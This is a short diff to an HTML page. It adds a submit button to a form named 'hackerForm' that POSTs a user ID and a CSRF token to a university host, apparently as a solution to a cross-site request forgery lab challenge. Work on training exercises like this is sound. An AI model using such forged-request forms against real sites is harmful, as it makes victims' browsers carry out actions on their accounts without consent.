--- a/index.html
+++ b/index.html
@@ -10,6 +10,7 @@
   <form name="hackerForm" action="https://snickerboa.it.liu.se/user/csrfchallengetwo/plusplus" method="POST">
     <input type="text" name="userId" value="87d0d107b1521d76bb260cc345c13bf90f6f4cd6" />
     <input type="hidden" name="csrfToken" value =csrfVar />
+    <input type="submit"/>
   </form>
 <script> 
   
